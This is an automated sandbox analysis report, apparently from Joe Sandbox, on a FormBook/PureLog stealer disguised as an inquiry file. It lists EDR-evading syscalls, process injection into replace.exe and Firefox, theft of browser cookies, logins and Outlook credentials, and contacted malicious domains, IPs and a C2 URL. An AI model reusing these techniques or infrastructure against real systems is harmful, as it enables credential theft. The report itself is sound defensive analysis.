                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4EB1D mov eax, dword ptr fs:[00000030h]4_2_00F4EB1D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4EB1D mov eax, dword ptr fs:[00000030h]4_2_00F4EB1D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4EB1D mov eax, dword ptr fs:[00000030h]4_2_00F4EB1D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F02CF0 mov eax, dword ptr fs:[00000030h]4_2_00F02CF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F02CF0 mov eax, dword ptr fs:[00000030h]4_2_00F02CF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F02CF0 mov eax, dword ptr fs:[00000030h]4_2_00F02CF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F02CF0 mov eax, dword ptr fs:[00000030h]4_2_00F02CF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECCCC8 mov eax, dword ptr fs:[00000030h]4_2_00ECCCC8
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80CB5 mov eax, dword ptr fs:[00000030h]4_2_00F80CB5
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F80CB5 mov eax, dword ptr fs:[00000030h]4_2_00F80CB5
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory written: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: NULL target: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeSection loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\replace.exeThread register set: target process: 7876Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\replace.exeThread APC queued: target process: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"Jump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess created: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe"Jump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683500781.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000000.1408244448.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000000.1550280734.0000000001A41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683500781.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000000.1408244448.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000000.1550280734.0000000001A41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683500781.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000000.1408244448.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000000.1550280734.0000000001A41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683500781.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000000.1408244448.0000000001000000.00000002.00000001.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000000.1550280734.0000000001A41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeQueries volume information: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1436066446.0000000004219000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1439477334.00000000091B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1436066446.0000000004219000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1439477334.00000000091B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		31
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		3
                Virtualization/Sandbox Evasion                		LSASS Memory3
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol11
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Disable or Modify Tools                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431986 Sample: INQ No. HDPE-16-GM-00- PI-I... Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 32 www.www60270.xyz 2->32 34 www.valentinaetommaso.it 2->34 36 21 other IPs or domains 2->36 44 Snort IDS alert for network traffic 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 6 other signatures 2->52 10 INQ No. HDPE-16-GM-00- PI-INQ-3001.exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 32->50 process4 signatures5 64 Injects a PE file into a foreign processes 10->64 13 INQ No. HDPE-16-GM-00- PI-INQ-3001.exe 10->13         started        16 WerFault.exe 21 16 10->16         started        18 INQ No. HDPE-16-GM-00- PI-INQ-3001.exe 10->18         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 20 yTVsQcNOAKqLIKj.exe 13->20 injected process8 signatures9 54 Found direct / indirect Syscall (likely to bypass EDR) 20->54 23 replace.exe 13 20->23         started        process10 signatures11 56 Tries to steal Mail credentials (via file / registry access) 23->56 58 Tries to harvest and steal browser information (history, passwords, etc) 23->58 60 Modifies the context of a thread in another process (thread injection) 23->60 62 2 other signatures 23->62 26 yTVsQcNOAKqLIKj.exe 23->26 injected 30 firefox.exe 23->30         started        process12 dnsIp13 38 www.fairmarty.top 203.161.46.103, 49743, 49744, 49745 VNPT-AS-VNVNPTCorpVN Malaysia 26->38 40 aprovapapafox.com 162.240.81.18, 49751, 49752, 49753 UNIFIEDLAYER-AS-1US United States 26->40 42 9 other IPs or domains 26->42 66 Found direct / indirect Syscall (likely to bypass EDR) 26->66 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                INQ No. HDPE-16-GM-00- PI-INQ-3001.exe32%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                INQ No. HDPE-16-GM-00- PI-INQ-3001.exe51%VirustotalBrowse
                INQ No. HDPE-16-GM-00- PI-INQ-3001.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                www.maxiwalls.com1%VirustotalBrowse
                www.skibinscy-finanse.pl0%VirustotalBrowse
                aprovapapafox.com0%VirustotalBrowse
                lb.webnode.io0%VirustotalBrowse
                www.colchondealquiler.com0%VirustotalBrowse
                www.choosejungmann.com0%VirustotalBrowse
                www.www60270.xyz2%VirustotalBrowse
                www.valentinaetommaso.it1%VirustotalBrowse
                www.onitsuka-ksa.com13%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                https://oblzpezqqfxqijsk.app0%Avira URL Cloudsafe
                http://www.solesense.pro/aleu/0%Avira URL Cloudsafe
                http://www.paydayloans3.shop/aleu/?MzYDklf=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZnRruwwT6g/D0s8W22E0wG3Y43Svl+j8+gYa6G242ZIg/F531ut75LnnH&PHaLL=ePmHKpKXdtoDqXh0%Avira URL Cloudsafe
